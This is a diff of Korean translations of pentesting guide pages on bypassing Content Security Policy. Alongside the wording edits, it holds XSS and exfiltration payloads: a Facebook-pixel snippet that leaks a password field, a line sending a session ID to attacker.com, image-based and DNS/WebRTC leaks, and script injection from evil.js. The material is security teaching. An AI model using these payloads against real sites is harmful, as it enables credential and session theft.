+게다가, 서버에서 허용하는 확장자를 가진 파일에 **JS 코드를 포함하여** 업로드할 수 있다고 하더라도(예: _script.png_) 이는 충분하지 않습니다. 왜냐하면 Apache 서버와 같은 일부 서버는 **확장자에 따라 파일의 MIME 유형을 선택하고**, Chrome과 같은 브라우저는 **이미지여야 하는 것 안의 Javascript** 코드를 실행하는 것을 **거부하기 때문입니다**. "다행히도", 실수가 있습니다. 예를 들어, CTF에서 **Apache는** _**.wave**_ 확장자를 알지 못하므로 **audio/\***와 같은 **MIME 유형으로 제공하지 않습니다**.
 
 여기서 XSS와 파일 업로드를 찾고, **잘못 해석된 확장자**를 찾으면, 해당 확장자와 스크립트 내용을 가진 파일을 업로드해 볼 수 있습니다. 또는 서버가 업로드된 파일의 올바른 형식을 확인하는 경우, 폴리글롯을 생성할 수 있습니다 ([여기에서 일부 폴리글롯 예제](https://github.com/Polydet/polyglot-database)).
 
@@ -197,7 +197,7 @@ With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-a
 <img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
 >
 ```
-#### Angular을 사용한 페이로드 + `window` 객체를 반환하는 함수가 있는 라이브러리 ([이 게시물을 확인하세요](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
+#### Angular과 `window` 객체를 반환하는 함수가 있는 라이브러리를 사용하는 페이로드 ([이 게시물을 확인하세요](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
 
 > [!NOTE]
 > 이 게시물은 `cdn.cloudflare.com` (또는 다른 허용된 JS 라이브러리 저장소)에서 모든 **라이브러리**를 **로드**하고, 각 라이브러리에서 추가된 모든 함수를 실행하며, **어떤 라이브러리의 어떤 함수가 `window` 객체를 반환하는지** 확인할 수 있음을 보여줍니다.
@@ -260,15 +260,15 @@ b=doc.createElement("script");
 b.src="//example.com/evil.js";
 b.nonce=a.nonce; doc.body.appendChild(b)' />
 ```
-#### www.google.com을 이용한 오픈 리디렉션 악용
+#### www.google.com을 이용한 오픈 리다이렉트 악용
 
-다음 URL은 example.com으로 리디렉션됩니다 (from [here](https://www.landh.tech/blog/20240304-google-hack-50000/)):
+다음 URL은 example.com으로 리다이렉트됩니다 (from [here](https://www.landh.tech/blog/20240304-google-hack-50000/)):
 ```
 https://www.google.com/amp/s/example.com/
 ```
 \*.google.com/script.google.com 악용하기
 
-script.google.com 내의 페이지에서 정보를 수신하기 위해 Google Apps Script를 악용할 수 있습니다. 이는 [이 보고서에서와 같이](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/) 수행됩니다.
+script.google.com 내의 페이지에서 정보를 수신하기 위해 Google Apps Script를 악용하는 것이 가능합니다. 이는 [이 보고서에서와 같이](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/) 수행됩니다.
 
 ### 제3자 엔드포인트 + JSONP
 ```http
@@ -286,7 +286,7 @@ https://www.youtube.com/oembed?callback=alert;
 ```
 [**JSONBee**](https://github.com/zigoo0/JSONBee) **는 다양한 웹사이트의 CSP 우회를 위한 사용 준비가 완료된 JSONP 엔드포인트를 포함합니다.**
 
-**신뢰할 수 있는 엔드포인트에 Open Redirect가 포함된 경우** 동일한 취약점이 발생합니다. 초기 엔드포인트가 신뢰할 수 있는 경우 리디렉션도 신뢰할 수 있습니다.
+**신뢰할 수 있는 엔드포인트에 Open Redirect가 포함되어 있으면** 동일한 취약점이 발생합니다. 초기 엔드포인트가 신뢰할 수 있는 경우 리디렉션도 신뢰됩니다.
 
 ### 제3자 남용
 
@@ -303,9 +303,9 @@ https://www.youtube.com/oembed?callback=alert;
 | Salesforce Heroku | \*.herokuapp.com                             | Exfil, Exec  |
 | Google Firebase   | \*.firebaseapp.com                           | Exfil, Exec  |
 
-대상 CSP에서 허용된 도메인을 발견하면, 제3자 서비스에 등록하여 해당 서비스로 데이터를 유출하거나 코드를 실행할 수 있는 가능성이 있습니다.
+대상 CSP에서 허용된 도메인을 찾으면, 제3자 서비스에 등록하여 해당 서비스로 데이터를 유출하거나 코드를 실행할 수 있는 가능성이 있습니다.
 
-예를 들어, 다음 CSP를 발견하면:
+예를 들어, 다음과 같은 CSP를 찾으면:
 ```
 Content-Security-Policy​: default-src 'self’ www.facebook.com;​
 ```
@@ -313,16 +313,16 @@ Content-Security-Policy​: default-src 'self’ www.facebook.com;​
 ```
 Content-Security-Policy​: connect-src www.facebook.com;​
 ```
-데이터를 유출할 수 있어야 하며, 이는 항상 [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/)를 사용하여 수행해온 방식과 유사합니다. 이 경우, 다음 일반 단계를 따릅니다:
+데이터를 유출할 수 있어야 하며, 이는 항상 [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/)를 사용하여 수행해 온 방식과 유사합니다. 이 경우, 다음 일반 단계를 따릅니다:
 
 1. 여기에서 Facebook Developer 계정을 만듭니다.
 2. 새 "Facebook Login" 앱을 만들고 "Website"를 선택합니다.
-3. "Settings -> Basic"으로 이동하여 "App ID"를 가져옵니다.
+3. "Settings -> Basic"으로 가서 "App ID"를 가져옵니다.
 4. 데이터 유출을 원하는 대상 사이트에서 "customEvent"와 데이터 페이로드를 통해 Facebook SDK 가젯 "fbq"를 직접 사용하여 데이터를 유출할 수 있습니다.
-5. 앱의 "Event Manager"로 이동하여 생성한 애플리케이션을 선택합니다 (이벤트 관리자는 다음과 유사한 URL에서 찾을 수 있습니다: https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events).
+5. 앱의 "Event Manager"로 가서 생성한 애플리케이션을 선택합니다 (이벤트 관리자는 다음과 유사한 URL에서 찾을 수 있습니다: https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events).
 6. "Test Events" 탭을 선택하여 "귀하의" 웹사이트에서 전송되는 이벤트를 확인합니다.
 
-그런 다음, 피해자 측에서 다음 코드를 실행하여 Facebook 추적 픽셀을 초기화하고 공격자의 Facebook 개발자 계정 앱 ID를 가리키며 다음과 같은 사용자 정의 이벤트를 발행합니다:
+그런 다음, 피해자 측에서 다음 코드를 실행하여 공격자의 Facebook 개발자 계정 앱 ID를 가리키도록 Facebook 추적 픽셀을 초기화하고 다음과 같은 사용자 정의 이벤트를 발행합니다:
 ```JavaScript
 fbq('init', '1279785999289471');​ // this number should be the App ID of the attacker's Meta/Facebook account
 fbq('trackCustom', 'My-Custom-Event',{​
@@ -333,7 +333,7 @@ data: "Leaked user password: '"+document.getElementById('user-password').innerTe
 
 ### RPO(상대 경로 덮어쓰기)를 통한 우회 <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
 
-경로 제한을 우회하기 위한 앞서 언급한 리디렉션 외에도, 일부 서버에서 사용할 수 있는 상대 경로 덮어쓰기(RPO)라는 또 다른 기술이 있습니다.
+경로 제한을 우회하기 위한 앞서 언급한 리디렉션 외에도, 일부 서버에서 사용할 수 있는 상대 경로 덮어쓰기(Relative Path Overwrite, RPO)라는 또 다른 기술이 있습니다.
 
 예를 들어, CSP가 경로 `https://example.com/scripts/react/`를 허용하는 경우, 다음과 같이 우회할 수 있습니다:
 ```html
@@ -368,7 +368,7 @@ data: "Leaked user password: '"+document.getElementById('user-password').innerTe
 ```
 ### AngularJS 이벤트
 
-특정 정책인 Content Security Policy (CSP)는 JavaScript 이벤트를 제한할 수 있습니다. 그럼에도 불구하고 AngularJS는 대안으로 사용자 정의 이벤트를 도입합니다. 이벤트 내에서 AngularJS는 네이티브 브라우저 이벤트 객체를 참조하는 고유한 객체 `$event`를 제공합니다. 이 `$event` 객체는 CSP를 우회하는 데 악용될 수 있습니다. 특히 Chrome에서는 `$event/event` 객체가 이벤트 실행 체인에 관련된 객체 배열을 보유하는 `path` 속성을 가지고 있으며, `window` 객체는 항상 끝에 위치합니다. 이 구조는 샌드박스 탈출 전술에 중요합니다.
+특정 정책인 Content Security Policy (CSP)는 JavaScript 이벤트를 제한할 수 있습니다. 그럼에도 불구하고, AngularJS는 대안으로 사용자 정의 이벤트를 도입합니다. 이벤트 내에서 AngularJS는 네이티브 브라우저 이벤트 객체를 참조하는 고유한 객체 `$event`를 제공합니다. 이 `$event` 객체는 CSP를 우회하는 데 악용될 수 있습니다. 특히 Chrome에서는 `$event/event` 객체가 이벤트 실행 체인에 관련된 객체 배열을 포함하는 `path` 속성을 가지고 있으며, `window` 객체는 항상 끝에 위치합니다. 이 구조는 샌드박스 탈출 전술에 중요합니다.
 
 이 배열을 `orderBy` 필터로 전달함으로써, 이를 반복하여 터미널 요소(즉, `window` 객체)를 활용해 `alert()`와 같은 전역 함수를 트리거할 수 있습니다. 아래의 코드 스니펫은 이 과정을 설명합니다:
 ```xml
@@ -393,11 +393,11 @@ ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com
 <!-- no longer working -->
 <script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
 ```
-다른 JSONP 임의 실행 엔드포인트는 [**여기**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt)에서 찾을 수 있습니다 (일부는 삭제되거나 수정되었습니다)
+다른 JSONP 임의 실행 엔드포인트는 [**여기**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt)에서 찾을 수 있습니다 (일부는 삭제되었거나 수정되었습니다).
 
 ### 리디렉션을 통한 우회
 
-CSP가 서버 측 리디렉션을 만났을 때 어떤 일이 발생할까요? 리디렉션이 허용되지 않는 다른 출처로 이어지면 여전히 실패합니다.
+CSP가 서버 측 리디렉션을 만났을 때 어떤 일이 발생할까요? 리디렉션이 허용되지 않은 다른 출처로 이어지면 여전히 실패합니다.
 
 그러나 [CSP spec 4.2.2.3. 경로 및 리디렉션](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects)에서 설명한 바에 따르면, 리디렉션이 다른 경로로 이어지면 원래의 제한을 우회할 수 있습니다.
 
@@ -421,11 +421,11 @@ content="script-src http://localhost:5555 https://www.google.com/a/b/c/d" />
 ```
 CSP가 `https://www.google.com/a/b/c/d`로 설정된 경우, 경로가 고려되므로 `/test`와 `/a/test` 스크립트는 CSP에 의해 차단됩니다.
 
-그러나 최종 `http://localhost:5555/301`는 **서버 측에서 `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`로 리디렉션됩니다.** 리디렉션이므로 **경로는 고려되지 않으며**, **스크립트를 로드할 수 있습니다**, 따라서 경로 제한을 우회하게 됩니다.
+그러나 최종 `http://localhost:5555/301`는 **서버 측에서 `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`로 리디렉션됩니다.** 리디렉션이므로 **경로는 고려되지 않으며**, **스크립트가 로드될 수 있습니다**, 따라서 경로 제한을 우회하게 됩니다.
 
 이 리디렉션으로 인해 경로가 완전히 지정되더라도 여전히 우회됩니다.
 
-따라서 최선의 해결책은 웹사이트에 열린 리디렉션 취약점이 없도록 하고 CSP 규칙에서 악용될 수 있는 도메인이 없도록 하는 것입니다.
+따라서 가장 좋은 해결책은 웹사이트에 열린 리디렉션 취약점이 없도록 하고 CSP 규칙에서 악용될 수 있는 도메인이 없도록 하는 것입니다.
 
 ### 매달린 마크업으로 CSP 우회
 
@@ -446,7 +446,7 @@ Image().src='http://PLAYER_SERVER/?'+_)
 ```
 From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
 
-이 구성은 **이미지 안에 삽입된 자바스크립트 코드를 로드하는 데** 악용될 수 있습니다. 예를 들어, 페이지가 Twitter에서 이미지를 로드하는 것을 허용하는 경우, **특별한 이미지**를 **제작**하여 Twitter에 **업로드**하고 "**unsafe-inline**"을 악용하여 JS 코드를 **실행**할 수 있습니다(일반적인 XSS처럼). 이 코드는 **이미지를 로드하고**, 그 안에서 **JS**를 **추출**하여 **실행**합니다: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
+이 구성은 **이미지 안에 삽입된 자바스크립트 코드를 로드하는 데** 악용될 수 있습니다. 예를 들어, 페이지가 Twitter에서 이미지를 로드하는 것을 허용하는 경우, **특별한 이미지**를 **제작**하여 Twitter에 **업로드**하고 "**unsafe-inline**"을 악용하여 **JS 코드를 실행**할 수 있습니다(일반적인 XSS처럼) 이 코드는 **이미지를 로드하고**, **JS를 추출**하여 **실행**합니다: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
 
 ### 서비스 워커와 함께
 
@@ -462,13 +462,25 @@ From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](
 
 #### 크롬
 
-당신이 보낸 **매개변수**가 **정책의 선언 안에 붙여넣기** 된다면, 당신은 **정책**을 어떤 식으로든 **무용하게** 만드는 방식으로 **변경**할 수 있습니다. 다음의 우회 방법 중 하나로 **스크립트 'unsafe-inline'**을 **허용**할 수 있습니다:
+당신이 보낸 **매개변수**가 **정책의 선언 안에 붙여넣기** 된다면, 당신은 **정책을 무력화**하는 방식으로 **정책을 변경**할 수 있습니다. 다음의 우회 방법 중 하나로 **스크립트 'unsafe-inline'을 허용**할 수 있습니다:
 ```bash
 script-src-elem *; script-src-attr *
 script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
 ```
 이 지시문은 **기존 script-src 지시문을 덮어씁니다**.\
-여기에서 예제를 찾을 수 있습니다: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%
+여기에서 예를 찾을 수 있습니다: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
+
+#### Edge
+
+Edge에서는 훨씬 간단합니다. CSP에 단지 이것을 추가할 수 있다면: **`;_`** **Edge**는 **전체 정책을 삭제**합니다.\
+예시: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](<http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E>)
+
+### img-src \*; via XSS (iframe) - 시간 공격
+
+지시문 `'unsafe-inline'`의 부재에 주목하세요.\
+이번에는 피해자가 **XSS**를 통해 **당신의 제어** 하에 있는 페이지를 **로드**하게 만들 수 있습니다. 이번에는 피해자가 정보를 추출하고자 하는 페이지에 접근하게 만들 것입니다 (**CSRF**). 페이지의 콘텐츠에 접근할 수는 없지만, 페이지가 로드되는 시간을 **제어할 수 있다면** 필요한 정보를 추출할 수 있습니다.
+
+이번에는 **플래그**가 추출될 것이며, SQLi를 통해 **문자가 올바르게 추측될 때마다** **응답**이 **더 많은 시간**을 소요하게 됩니다. 그러면 플래그를 추출할 수 있게 됩니다:
 ```html
 <!--code from https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle -->
 <iframe name="f" id="g"></iframe> // The bot will load an URL with the payload
@@ -536,7 +548,7 @@ run()
 
 ### CSP 제한을 통한 CSP 우회
 
-[**이 CTF 작성글**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution)에서 CSP는 허용된 iframe 내부에 더 제한적인 CSP를 주입하여 우회되며, 이 CSP는 특정 JS 파일의 로드를 허용하지 않도록 설정되어 있습니다. 그 후, **프로토타입 오염** 또는 **DOM 클로버링**을 통해 **다른 스크립트를 악용하여 임의의 스크립트를 로드할 수 있게** 합니다.
+[**이 CTF 작성글**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution)에서 CSP는 허용된 iframe 내부에 더 제한적인 CSP를 주입하여 우회되며, 이 CSP는 특정 JS 파일을 로드하는 것을 허용하지 않으며, 이후 **프로토타입 오염** 또는 **DOM 클러버링**을 통해 **임의의 스크립트를 로드하기 위해 다른 스크립트를 악용할 수 있게** 합니다.
 
 **`csp`** 속성으로 **iframe의 CSP를 제한할 수 있습니다**:
 ```html
@@ -544,8 +556,8 @@ run()
 src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]"
 csp="script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'"></iframe>
 ```
-[**이 CTF 작성글**](https://github.com/aszx87410/ctf-writeups/issues/48)에서는 **HTML 주입**을 통해 **CSP**를 더 제한적으로 설정할 수 있어 CSTI를 방지하는 스크립트가 비활성화되었고, 따라서 **취약점이 악용 가능해졌습니다.**\
-CSP는 **HTML 메타 태그**를 사용하여 더 제한적으로 만들 수 있으며, 인라인 스크립트는 **제거**하여 그들의 **nonce**를 허용하고 특정 인라인 스크립트를 sha를 통해 활성화할 수 있습니다:
+[**이 CTF 작성글**](https://github.com/aszx87410/ctf-writeups/issues/48)에서는 **HTML 주입**을 통해 **CSP**를 더 제한하여 CSTI를 방지하는 스크립트를 비활성화할 수 있었고, 따라서 **취약점이 악용 가능해졌습니다.**\
+CSP는 **HTML 메타 태그**를 사용하여 더 제한적으로 만들 수 있으며, 인라인 스크립트는 **제거**하여 그들의 **nonce**를 허용하고 **sha를 통해 특정 인라인 스크립트를 활성화**할 수 있습니다:
 ```html
 <meta
 http-equiv="Content-Security-Policy"
@@ -556,7 +568,7 @@ content="script-src 'self'
 ```
 ### JS exfiltration with Content-Security-Policy-Report-Only
 
-서버가 **`Content-Security-Policy-Report-Only`** 헤더를 **당신이 제어하는 값**으로 응답하도록 만들 수 있다면(아마도 CRLF 때문일 수 있음), 당신의 서버를 가리키게 할 수 있으며, **전달하고자 하는 JS 콘텐츠**를 **`<script>`**로 감싸면 CSP에 의해 `unsafe-inline`이 허용되지 않을 가능성이 높기 때문에, 이는 **CSP 오류**를 유발하고 스크립트의 일부(민감한 정보가 포함된)가 `Content-Security-Policy-Report-Only`에서 서버로 전송됩니다.
+서버가 **`Content-Security-Policy-Report-Only`** 헤더를 **당신이 제어하는 값**으로 응답하도록 만들 수 있다면(아마도 CRLF 때문일 수 있음), 당신의 서버를 가리키게 할 수 있으며, **전송하려는 JS 콘텐츠**를 **`<script>`**로 감싸면 CSP에 의해 `unsafe-inline`이 허용되지 않을 가능성이 높기 때문에, 이는 **CSP 오류**를 발생시키고 스크립트의 일부(민감한 정보가 포함된)가 `Content-Security-Policy-Report-Only`에서 서버로 전송됩니다.
 
 예시로 [**이 CTF 작성글을 확인하세요**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes).
 
@@ -571,34 +583,34 @@ document.querySelector("DIV").innerHTML =
 - 이 URL은 비밀 URL(예: `https://usersecret.example2.com`)로 리디렉션되며, 이는 CSP에 의해 **허용되지 않습니다**.
 - `securitypolicyviolation` 이벤트를 수신함으로써 `blockedURI` 속성을 캡처할 수 있습니다. 이 속성은 차단된 URI의 도메인을 드러내어 초기 URL이 리디렉션된 비밀 도메인을 유출합니다.
 
-Chrome 및 Firefox와 같은 브라우저가 CSP와 관련하여 iframe을 처리하는 방식이 다르다는 점은 흥미롭습니다. 이는 정의되지 않은 동작으로 인해 민감한 정보가 유출될 수 있는 가능성을 초래합니다.
+Chrome 및 Firefox와 같은 브라우저가 CSP와 관련하여 iframe을 처리하는 방식이 다르다는 점은 흥미롭습니다. 이는 정의되지 않은 동작으로 인해 민감한 정보가 유출될 수 있습니다.
 
-또 다른 기술은 CSP 자체를 이용하여 비밀 서브도메인을 유추하는 것입니다. 이 방법은 이진 검색 알고리즘에 의존하며, 특정 도메인을 의도적으로 차단하도록 CSP를 조정합니다. 예를 들어, 비밀 서브도메인이 알려지지 않은 문자로 구성되어 있다면, CSP 지시어를 수정하여 이러한 서브도메인을 차단하거나 허용함으로써 반복적으로 다양한 서브도메인을 테스트할 수 있습니다. 다음은 이 방법을 용이하게 하기 위해 CSP가 설정될 수 있는 방식을 보여주는 코드 조각입니다:
+또 다른 기술은 CSP 자체를 이용하여 비밀 서브도메인을 유추하는 것입니다. 이 방법은 이진 검색 알고리즘에 의존하며, 특정 도메인을 의도적으로 차단하도록 CSP를 조정합니다. 예를 들어, 비밀 서브도메인이 알려지지 않은 문자로 구성된 경우, CSP 지시어를 수정하여 이러한 서브도메인을 차단하거나 허용함으로써 다양한 서브도메인을 반복적으로 테스트할 수 있습니다. 다음은 이 방법을 용이하게 하기 위해 CSP가 설정될 수 있는 방식을 보여주는 코드 조각입니다:
 ```markdown
 img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
 ```
-CSP에 의해 차단되거나 허용된 요청을 모니터링함으로써, 비밀 서브도메인에서 가능한 문자들을 좁혀 나가고, 결국 전체 URL을 밝혀낼 수 있습니다.
+CSP에 의해 차단되거나 허용된 요청을 모니터링함으로써, 비밀 서브도메인에서 가능한 문자들을 좁힐 수 있으며, 결국 전체 URL을 밝혀낼 수 있습니다.
 
 두 방법 모두 CSP 구현 및 브라우저에서의 동작의 미세한 차이를 이용하여, 겉보기에는 안전한 정책이 어떻게 의도치 않게 민감한 정보를 유출할 수 있는지를 보여줍니다.
 
-[**여기**](https://ctftime.org/writeup/29310)에서의 트릭.
+Trick from [**here**](https://ctftime.org/writeup/29310).
 
 ## CSP 우회를 위한 안전하지 않은 기술
 
-### 너무 많은 파라미터로 인한 PHP 오류
+### 너무 많은 매개변수로 인한 PHP 오류
 
-[**이 비디오에서 언급된 마지막 기술**](https://www.youtube.com/watch?v=Sm4G6cAHjWM)에 따르면, 너무 많은 파라미터(1001 GET 파라미터, POST 파라미터 및 20개 이상의 파일로도 가능)를 보내면, 정의된 **`header()`**가 PHP 웹 코드에서 **전송되지 않습니다**. 이는 오류를 유발하기 때문입니다.
+[**이 비디오에서 언급된 마지막 기술**](https://www.youtube.com/watch?v=Sm4G6cAHjWM)에 따르면, 너무 많은 매개변수(1001 GET 매개변수, POST 매개변수 및 20개 이상의 파일로도 가능)를 보내면, 정의된 **`header()`**가 PHP 웹 코드에서 **전송되지 않습니다**. 이로 인해 오류가 발생합니다.
 
 ### PHP 응답 버퍼 오버로드
 
 PHP는 기본적으로 **4096** 바이트까지 응답을 **버퍼링**하는 것으로 알려져 있습니다. 따라서 PHP가 경고를 표시하는 경우, **경고 안에 충분한 데이터를 제공함으로써**, **응답**이 **CSP 헤더** **이전**에 **전송**되어 헤더가 무시됩니다.\
 그런 다음, 이 기술은 기본적으로 **경고로 응답 버퍼를 채우는 것**으로 구성되어 CSP 헤더가 전송되지 않도록 합니다.
 
-[**이 글**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points)에서 아이디어를 얻었습니다.
+Idea from [**this writeup**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points).
 
 ### 오류 페이지 재작성
 
-[**이 글**](https://blog.ssrf.kr/69)에서 CSP 보호를 우회하기 위해 오류 페이지(잠재적으로 CSP가 없는)를 로드하고 그 내용을 재작성하는 것이 가능했던 것으로 보입니다.
+[**이 글**](https://blog.ssrf.kr/69)에서 보듯이, 오류 페이지(잠재적으로 CSP가 없는) 로드 및 그 내용을 재작성하여 CSP 보호를 우회할 수 있었던 것으로 보입니다.
 ```javascript
 a = window.open("/" + "x".repeat(4100))
 setTimeout(function () {
@@ -607,15 +619,15 @@ a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0le
 ```
 ### SOME + 'self' + wordpress
 
-SOME은 **페이지의 엔드포인트**에서 XSS(또는 매우 제한된 XSS)를 악용하여 **동일 출처의 다른 엔드포인트를 악용하는** 기술입니다. 이는 공격자 페이지에서 취약한 엔드포인트를 로드한 다음, 악용하고자 하는 동일 출처의 실제 엔드포인트로 공격자 페이지를 새로 고침하여 수행됩니다. 이렇게 하면 **취약한 엔드포인트**가 **페이로드**의 **`opener`** 객체를 사용하여 **악용할 실제 엔드포인트의 DOM**에 **접근**할 수 있습니다. 더 많은 정보는 다음을 확인하세요:
+SOME은 **페이지의 엔드포인트**에서 XSS(또는 매우 제한된 XSS)를 악용하여 **동일 출처의 다른 엔드포인트를 악용하는** 기술입니다. 이는 공격자 페이지에서 취약한 엔드포인트를 로드한 다음, 악용하고자 하는 동일 출처의 실제 엔드포인트로 공격자 페이지를 새로 고침하여 수행됩니다. 이렇게 하면 **취약한 엔드포인트**가 **페이로드**의 **`opener`** 객체를 사용하여 **악용할 실제 엔드포인트의 DOM**에 접근할 수 있습니다. 더 많은 정보는 다음을 확인하세요:
 
 {{#ref}}
 ../xss-cross-site-scripting/some-same-origin-method-execution.md
 {{#endref}}
 
-게다가, **wordpress**는 `/wp-json/wp/v2/users/1?_jsonp=data`에 **JSONP** 엔드포인트를 가지고 있으며, 이는 출력에서 전송된 **데이터**를 **반영**합니다(단, 문자, 숫자 및 점만 허용됨).
+게다가, **wordpress**는 `/wp-json/wp/v2/users/1?_jsonp=data`에 **JSONP** 엔드포인트가 있어 **출력에 전송된 데이터**를 **반영**합니다(단, 문자, 숫자 및 점만 허용됨).
 
-공격자는 해당 엔드포인트를 악용하여 WordPress에 대한 **SOME 공격**을 **생성**하고 `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` 안에 **임베드**할 수 있습니다. 이 **스크립트**는 **'self'에 의해 허용되기 때문에** **로드**될 것입니다. 또한, WordPress가 설치되어 있기 때문에 공격자는 **CSP를 우회하는** **취약한** **콜백** 엔드포인트를 통해 **SOME 공격**을 악용하여 사용자에게 더 많은 권한을 부여하거나 새로운 플러그인을 설치할 수 있습니다...\
+공격자는 해당 엔드포인트를 악용하여 WordPress에 대한 **SOME 공격을 생성**하고 `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` 안에 **임베드**할 수 있습니다. 이 **스크립트**는 **'self'에 의해 허용되기 때문에** **로드**됩니다. 또한, WordPress가 설치되어 있기 때문에 공격자는 **CSP를 우회하는** **취약한** **콜백** 엔드포인트를 통해 **SOME 공격**을 악용하여 사용자에게 더 많은 권한을 부여하거나 새로운 플러그인을 설치할 수 있습니다...\
 이 공격을 수행하는 방법에 대한 더 많은 정보는 [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)를 확인하세요.
 
 ## CSP Exfiltration Bypasses
@@ -637,7 +649,7 @@ document.location = "https://attacker.com/?" + sessionid
 ```
 ### DNS Prefetch
 
-페이지를 더 빠르게 로드하기 위해 브라우저는 호스트 이름을 IP 주소로 미리 해결하고 나중에 사용할 수 있도록 캐시합니다.\
+페이지 로드를 더 빠르게 하기 위해, 브라우저는 호스트 이름을 IP 주소로 미리 해결하고 이를 나중에 사용하기 위해 캐시합니다.\
 브라우저에 호스트 이름을 미리 해결하도록 지시할 수 있습니다: `<link rel="dns-prefetch" href="something.com">`
 
 이 동작을 악용하여 **DNS 요청을 통해 민감한 정보를 유출할 수 있습니다**:
@@ -668,7 +680,7 @@ X-DNS-Prefetch-Control: off
 
 여러 페이지에서 **WebRTC가 CSP의 `connect-src` 정책을 확인하지 않는다**고 읽을 수 있습니다.
 
-실제로 _DNS 요청_을 사용하여 정보를 _leak_할 수 있습니다. 이 코드를 확인해 보세요:
+실제로 _DNS 요청_을 사용하여 정보를 _유출_할 수 있습니다. 이 코드를 확인해 보세요:
 ```javascript
 ;(async () => {
 p = new RTCPeerConnection({ iceServers: [{ urls: "stun:LEAK.dnsbin" }] })
diff --git a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
index 1b89a4aac..14141e49f 100644
--- a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
+++ b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
@@ -2,11 +2,11 @@ A configuration such as:
 ```
 Content-Security-Policy: default-src 'self' 'unsafe-inline';
 ```
-코드로 전송된 문자열을 실행하는 모든 함수의 사용을 금지합니다. 예를 들어: `eval, setTimeout, setInterval`은 `unsafe-eval` 설정으로 인해 모두 차단됩니다.
+코드가 문자열로 전송되는 함수를 실행하는 것을 금지합니다. 예를 들어: `eval, setTimeout, setInterval`은 `unsafe-eval` 설정으로 인해 모두 차단됩니다.
 
 외부 소스의 모든 콘텐츠도 차단되며, 여기에는 이미지, CSS, WebSockets, 특히 JS가 포함됩니다.
 
-### 텍스트 및 이미지 경로
+### 텍스트 및 이미지 경유
 
